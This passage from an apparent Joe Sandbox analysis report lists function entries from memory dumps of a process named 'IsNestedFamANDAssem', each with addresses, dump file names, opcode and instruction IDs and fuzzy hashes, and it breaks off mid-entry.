                                                          • Instruction Fuzzy Hash: 3451D774D0520DCFEB94DFA9E484AEDBBB2FB88304F20812AD405A7254EB74A945CF52
                                                          Function 06097628 Relevance: .1, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3aee899e181cd9fb6bae9fc13928deff428873987dea9a5fd1c26c804b981cf8
                                                          • Instruction ID: 040f4d3492205b9bc455b4f3a20073bc61f478c49064e153c97bf0063070af22
                                                          • Opcode Fuzzy Hash: 3aee899e181cd9fb6bae9fc13928deff428873987dea9a5fd1c26c804b981cf8
                                                          • Instruction Fuzzy Hash: 0551FE74E462088FEB94CF69D840BADBBF6FB89304F1490A9C419A7351DB381E88CF51
                                                          Function 060976F2 Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3b690001c18fee5d0ca9fff905651f0208c5ccf35e2c4cd2e458bb3d6f50245
                                                          • Instruction ID: d2af43e9f209cb1bdf62368cc5a3fabf5cb2aace143234aefb51c973c3c6284f
                                                          • Opcode Fuzzy Hash: d3b690001c18fee5d0ca9fff905651f0208c5ccf35e2c4cd2e458bb3d6f50245
                                                          • Instruction Fuzzy Hash: F851CC74E562088FEB94CFA9D880BADBBF2FB89304F1494A9D419A7251D7386D84CF50
                                                          Function 0609E678 Relevance: .1, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6cff19ea446e9cf0e4ae685370b8bbf1e2f20ca81f09c0309ea3f40d4f121de1
                                                          • Instruction ID: 6334f9401f3eb309565e03204fc055d47461e8230d8f015530cd75f45c265535
                                                          • Opcode Fuzzy Hash: 6cff19ea446e9cf0e4ae685370b8bbf1e2f20ca81f09c0309ea3f40d4f121de1
                                                          • Instruction Fuzzy Hash: 174105B0E012089FDB44DFA9D840AAEBBF6FF89300F148429E515A7391DB399D45CF90
                                                          Function 06D771F0 Relevance: .1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 04dccf1847d3efe4d4440d4c51e511095d80e047a73c3c29e6db8536886dfd8f
                                                          • Instruction ID: ab94908d870778a862bc01b5dd5eeb90d64ac775ec86b5ad7d2dfa98252ea4d4
                                                          • Opcode Fuzzy Hash: 04dccf1847d3efe4d4440d4c51e511095d80e047a73c3c29e6db8536886dfd8f
                                                          • Instruction Fuzzy Hash: F951D570E01208DFDB68DFB9D554A9DBBF2BF88304F24852AE819AB350DB359945CF41
                                                          Function 0609D658 Relevance: .1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e7f5f0593631f4cee499c84a1220242b4ee438276cc145b5863e33c3d00a7052
                                                          • Instruction ID: adb974821740a0bd9d89061da11c64b2aa6bf2acf5c2f506510a4952502bde99
                                                          • Opcode Fuzzy Hash: e7f5f0593631f4cee499c84a1220242b4ee438276cc145b5863e33c3d00a7052
                                                          • Instruction Fuzzy Hash: A7410671D40A19DFDB44DFA9D840ADDBBB6FF89310F008529E519B7640DB74A884DF90
                                                          Function 06D771E0 Relevance: .1, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 90332ad3cabac4167f2016dab574827d6acd17ff8ca9059e587ec15769d943aa
                                                          • Instruction ID: e9f3b181e8dfd0797b0efaa514b54c248da7129e99a6afb01b78da345dd7e0d8
                                                          • Opcode Fuzzy Hash: 90332ad3cabac4167f2016dab574827d6acd17ff8ca9059e587ec15769d943aa
                                                          • Instruction Fuzzy Hash: 0F41D570E01208DFDB68DFB9D454A9DBBF2BF89305F24852AE819AB250DB319942CF41
                                                          Function 06D75AAB Relevance: .1, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0de2202d6d217dfe6bcf5057abe93006b86042fd5e389ff15c897d54d6f070d3
                                                          • Instruction ID: f96edf9e824500b17dedcb341144d45bbaf00a0d2b540eb9541d76c893098de2
                                                          • Opcode Fuzzy Hash: 0de2202d6d217dfe6bcf5057abe93006b86042fd5e389ff15c897d54d6f070d3
                                                          • Instruction Fuzzy Hash: 8A41E774D0520DCFEB94CFA9E484BEDBBB2FB88304F14812AD045A7250EB74A945CB93
                                                          Function 06D7FC58 Relevance: .1, Instructions: 91COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b391b274860c9f4587b3da17163486629ee9a816b2752b4879c306a89c7d7deb
                                                          • Instruction ID: 24ef6d257e32199289a323857246145d622850f68df1ccc097c05a247cd94c1b
                                                          • Opcode Fuzzy Hash: b391b274860c9f4587b3da17163486629ee9a816b2752b4879c306a89c7d7deb
                                                          • Instruction Fuzzy Hash: 12312574E042088FDB44CFAAC4846EEBBF2EB89305F10C469D919B7354E7389945CF92
                                                          Function 0609796A Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 770da4e6a16d2b71870ffe3c01aee3faef193dd8ab4add51dfb11b2c2e761ded
                                                          • Instruction ID: d663fc2eeb28c0ed1c168fb7d0c30d2600c1675d2e427e6f0cbcaa3a0e561f6f
                                                          • Opcode Fuzzy Hash: 770da4e6a16d2b71870ffe3c01aee3faef193dd8ab4add51dfb11b2c2e761ded
                                                          • Instruction Fuzzy Hash: 8641DE78A023188FDB94DF68D884B9DBBB2FB89304F1485A9D419A7351DB386E84CF51
                                                          Function 0166150C Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79ef6808bdf3d8eb1396f32ac2186af3bbaa97f8771b05c2bdc704de3b8e24ab
                                                          • Instruction ID: bd4d7143052d7572d8c9f5b98ea9d8947f4e3af0eb242737d8a1180db1334a30
                                                          • Opcode Fuzzy Hash: 79ef6808bdf3d8eb1396f32ac2186af3bbaa97f8771b05c2bdc704de3b8e24ab
                                                          • Instruction Fuzzy Hash: 3B3119B1D002599FDB14CFA9C980AEEBFF5BF48304F248429E519AB350DB349946CFA0
                                                          Function 0609C4D8 Relevance: .1, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6515957f42b30e1fe4b88b6d3f5599169b757336ce1967983efef4828a07c6d4
                                                          • Instruction ID: 675fe0490680ab585a48d00bd13d8988bd257c80ab8a4d69eedf46b8fcca5b9c
                                                          • Opcode Fuzzy Hash: 6515957f42b30e1fe4b88b6d3f5599169b757336ce1967983efef4828a07c6d4
                                                          • Instruction Fuzzy Hash: 5731C370E45209DFDF84CF69D841AAEBBF6EB8A300F04C0A9D419A7251D7399D85CFA0
                                                          Function 01660BF8 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf9fabb5d4d1f038d97a0d0581802172cd1e5c81060e4d456faa6fff427dee23
                                                          • Instruction ID: 202fa24be86e472341c1f648a25fb2e567ef6668642a1d9fb343edc15d06246d
                                                          • Opcode Fuzzy Hash: bf9fabb5d4d1f038d97a0d0581802172cd1e5c81060e4d456faa6fff427dee23
                                                          • Instruction Fuzzy Hash: B3217E30B04305DFCB04AFA8C85467D7BBAFB89204B20053DE4079B354DB7A9D478B96
                                                          Function 01661518 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 90e3ebeba25d88d136c858caf45f2d505d4eec837a5268fe81f47cca16f4f415
                                                          • Instruction ID: d63a6aa79534246bb4cd812b7d156587cec704918d0921cc698ccf90d1495f5d
                                                          • Opcode Fuzzy Hash: 90e3ebeba25d88d136c858caf45f2d505d4eec837a5268fe81f47cca16f4f415
                                                          • Instruction Fuzzy Hash: 2D3119B0D002589FDB14DFAAC990ADEFFF5AF49344F248429E919AB350DB349945CFA0
                                                          Function 06096F84 Relevance: .1, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c70cb2e0c8ac52d87e96282b7d65bf5832937830dd375dc2f3284931f8440606
                                                          • Instruction ID: b52d18ff8f7f7ac04b1a933627a0c949ec08072ddbc1e4f3435c07e81d807555
                                                          • Opcode Fuzzy Hash: c70cb2e0c8ac52d87e96282b7d65bf5832937830dd375dc2f3284931f8440606
                                                          • Instruction Fuzzy Hash: 91410678E012198FDB94DF68D894BADB7B2FB89304F0080A9D95DA7351DB396D89CF40
                                                          Function 0609C808 Relevance: .1, Instructions: 79COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f80f9c68c43f0e0d586d993b75838cf3f0889040f89ff92fbcc4eb47e997c2aa
                                                          • Instruction ID: f4270448708d645d1af33248bdf47593a4516210e43524dbd5c2a254cb975da1
                                                          • Opcode Fuzzy Hash: f80f9c68c43f0e0d586d993b75838cf3f0889040f89ff92fbcc4eb47e997c2aa
                                                          • Instruction Fuzzy Hash: 8F315C70E052098FEB88CF69D8416EEBBF6EB89300F1480A9D519A7291D7795945CF90
                                                          Function 01660BC3 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c15a82494a06331960e40feef8acea3dcb1ad7e652e9b9322c839c9533ec87ff
                                                          • Instruction ID: a63a7c075d96978e12c9775fc520244c63bdce18afd3441a81015c560e83039d
                                                          • Opcode Fuzzy Hash: c15a82494a06331960e40feef8acea3dcb1ad7e652e9b9322c839c9533ec87ff
                                                          • Instruction Fuzzy Hash: 47219C31704300CFCB05AB68D49457C77B6EB89218B24057DE4039B399CF7A9C879792
                                                          Function 06097350 Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e5e58233fbc4c5116e6224c74ad40a04400bf8d36baaf45ce0744f5e66747d6a
                                                          • Instruction ID: 1fd7cde0d870ad868bb2e6595f672a5d13be2371be357602f85015c0bedcb788
                                                          • Opcode Fuzzy Hash: e5e58233fbc4c5116e6224c74ad40a04400bf8d36baaf45ce0744f5e66747d6a
                                                          • Instruction Fuzzy Hash: A0216B75D44209DFDB44DFA9D8006EEBBB6FB89304F108069D514A3381D7784A45CFA1
                                                          Function 06099379 Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8be1beca154be2d8f04112fcdd2fac81185d51e5252a515b2e828cbd8f92af5d
                                                          • Instruction ID: ef6b84a040444142f3238c1afbbe2db0bc0c139e796307e70db95c51cc6f594b
                                                          • Opcode Fuzzy Hash: 8be1beca154be2d8f04112fcdd2fac81185d51e5252a515b2e828cbd8f92af5d
                                                          • Instruction Fuzzy Hash: 8031AE74A412588FDBA4DF58C884B99BBB2BB4A304F1484EAD50DB7250DB399EC9CF10
                                                          Function 0139D030 Relevance: .1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367007653.000000000139D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0139D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_139d000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62da447e7620055881b6ebb1fda9636c5dabfe7699c2bd915e44daf494816841
                                                          • Instruction ID: faf5044d9d8e703d673eafdad3efdf66519b5e6c5586d602d22bedf085e74b7b
                                                          • Opcode Fuzzy Hash: 62da447e7620055881b6ebb1fda9636c5dabfe7699c2bd915e44daf494816841
                                                          • Instruction Fuzzy Hash: 3F2103B2504204DFCF15DF58D9C5B26BF69FB84318F20C569D9090B356C33AD406CAA2
                                                          Function 0609C818 Relevance: .1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7960dc31bc747f43bac1c80ef2cd1d3d262ec3cfffb7e5bb9e06c39e38855386
                                                          • Instruction ID: 7c012afab467561f7d37b8c88ee9dd74ec050986d3b01678da4d26aa5c388e29
                                                          • Opcode Fuzzy Hash: 7960dc31bc747f43bac1c80ef2cd1d3d262ec3cfffb7e5bb9e06c39e38855386
                                                          • Instruction Fuzzy Hash: BB216B70E05209CFEB88CF69D8406AEBBF6EB89300F10C479D519A7350D7B99945CF94
                                                          Function 0166FDB8 Relevance: .1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a52e4ae95274622c4a82497322bc3203f8cb80ff47b9435015b80a09d4025d9
                                                          • Instruction ID: 80faf25f617e1b7a0d7c85f861158bacca701683dd7efccc5c16f8a10bb3a2ee
                                                          • Opcode Fuzzy Hash: 8a52e4ae95274622c4a82497322bc3203f8cb80ff47b9435015b80a09d4025d9
                                                          • Instruction Fuzzy Hash: 21310735E00119AFCB05DFA8E850AEDBBB6FF48310F10816AE905AB351CB356909CF91
                                                          Function 0609C4E8 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b5964ceeae5341ab40cc549158559e8e67b45d745b29ae30f155be85913877e
                                                          • Instruction ID: 7e2ee9925c0667a79db40527ecbae50bfd9431feca30a9b5792986f44da13d7a
                                                          • Opcode Fuzzy Hash: 2b5964ceeae5341ab40cc549158559e8e67b45d745b29ae30f155be85913877e
                                                          • Instruction Fuzzy Hash: D6215EB0E45209DFEF84CF69D441AAEBBF6FB89300F10C465D519A7250DB399985CFA0
                                                          Function 06D778F0 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a065e951f699cbb94bf696b5f44da583c444bb58abff89a58bceae92c6f172b9
                                                          • Instruction ID: 54fdd791f61432330dab1ea38ccd044b878bd200c133f3ec4cecbe6ded7bc4fd
                                                          • Opcode Fuzzy Hash: a065e951f699cbb94bf696b5f44da583c444bb58abff89a58bceae92c6f172b9
                                                          • Instruction Fuzzy Hash: A6212C70E06209DFDB54DFA9C4446AEFBF6FB88310F1089A9C855A7354E7349981CF92
                                                          Function 06097360 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 73458e6ce643558e4fbcdb0b24d006adc80a3af22a2c8774f7d179649e30a186
                                                          • Instruction ID: 529600de823ca46d17826bf3d0eaa97bc9b8010b21f7d6e380af57c8d5124456
                                                          • Opcode Fuzzy Hash: 73458e6ce643558e4fbcdb0b24d006adc80a3af22a2c8774f7d179649e30a186
                                                          • Instruction Fuzzy Hash: 56217875E44209CFDF44DFA9D8006EEBBB6FB89304F008068D915A3381DB7889449FA1
                                                          Function 016623C8 Relevance: .1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f51ec783c46e545b3cdc6d840ad728e91fdb27f3f8d95e59da434eb437840c18
                                                          • Instruction ID: 173bc25d1a05115e0baa296e557e4ac6c203f187811116f9870f871bf7b1362a
                                                          • Opcode Fuzzy Hash: f51ec783c46e545b3cdc6d840ad728e91fdb27f3f8d95e59da434eb437840c18
                                                          • Instruction Fuzzy Hash: 89215CB4D01208DFEB01DFA8D4587ADBBF9FB5A305F1080A9C419E3746D7794A85CB51
                                                          Function 07160A1E Relevance: .1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386674114.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7160000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b79912457d9aad515fae277c062b31e9497242010d660a45968adc84fa859cc1
                                                          • Instruction ID: 9791484ffe03af616dab9f7a73ec1983a4060aa004a70c90224c3ca83e951ba4
                                                          • Opcode Fuzzy Hash: b79912457d9aad515fae277c062b31e9497242010d660a45968adc84fa859cc1
                                                          • Instruction Fuzzy Hash: 08319078A022298FDB64CF28D984AD8B7B1FB0A304F1085E9D81DA7B54D7349E858F52
                                                          Function 06097270 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0cb2fae52290883d56d3c03fde490e743677a62f0bcc8ac08a7e368a3ce70e60
                                                          • Instruction ID: 33fcdefdd4e241d529c49def43cd543ac686229bd671e92ac3443298c2435c93
                                                          • Opcode Fuzzy Hash: 0cb2fae52290883d56d3c03fde490e743677a62f0bcc8ac08a7e368a3ce70e60
                                                          • Instruction Fuzzy Hash: EA1104355A2209EFCB54EF70CC019AABFFBEF05204B50809DF58966111E7325951EBF4
                                                          Function 0609BDE8 Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a89363ecd2766f665583e425b2118d7f23fab6e77d01fc6239f01b6ccf9a3fc
                                                          • Instruction ID: c55f2b545446c4077414c179e5d7769952c8ac46f940e795c4e73c71a7eff0a5
                                                          • Opcode Fuzzy Hash: 5a89363ecd2766f665583e425b2118d7f23fab6e77d01fc6239f01b6ccf9a3fc
                                                          • Instruction Fuzzy Hash: 31319074A01218CFEB94DF68C980B99BBF2FB88314F1081A9D50DA7395DB359E85CF50
                                                          Function 016623D8 Relevance: .1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ef2b03fedb917a7b80d57e20e87a87ad38856ea7aafd633b58b21b71651b65d
                                                          • Instruction ID: b39d0e86f4502dced0f3ceda2fe3783fdf33b9e189976dae0702ec6c5ab6b1d3
                                                          • Opcode Fuzzy Hash: 6ef2b03fedb917a7b80d57e20e87a87ad38856ea7aafd633b58b21b71651b65d
                                                          • Instruction Fuzzy Hash: FE2138B4D06208DFEB04DFA8D8587ADBBF9FB4A305F1080A9C419E3346DB794A85CB41
                                                          Function 06099165 Relevance: .1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e6c30f98a37b1d3370fa10110f4887701f2efc8aab0b62dfae524dad1e2509d
                                                          • Instruction ID: 2c0465ce1a883b06ad34f5ef2a575b76b3722a6bb6d1d8e228aa28715f28ab08
                                                          • Opcode Fuzzy Hash: 7e6c30f98a37b1d3370fa10110f4887701f2efc8aab0b62dfae524dad1e2509d
                                                          • Instruction Fuzzy Hash: E231A074944218CFDBA4CF58C884BA9BBB2BB49304F1484EAD50DB7250DB399EC9CF24
                                                          Function 01660A6D Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e2f14ed2fea55fb1e6b7fcadecba03d03654e3a758633763f9b270592588423b
                                                          • Instruction ID: e9f1f1eeac3cce0cbe87e198c9013bd17eadfedf41143fc7054c1d56a5acbd56
                                                          • Opcode Fuzzy Hash: e2f14ed2fea55fb1e6b7fcadecba03d03654e3a758633763f9b270592588423b
                                                          • Instruction Fuzzy Hash: F2217F34B40209DFCB44DFA8D898AAD7BF6EF48314F158469E502EB361CBB58C46CB40
                                                          Function 0609AE37 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0af113a76e87100a1ffcfdad299bdcc8e2d3197d68c68ce09d69967ba3d59c1d
                                                          • Instruction ID: cd45affbae6d171bb5bfd20a6e6c99e194b14a90c4074a7eaba27c5083a0bde9
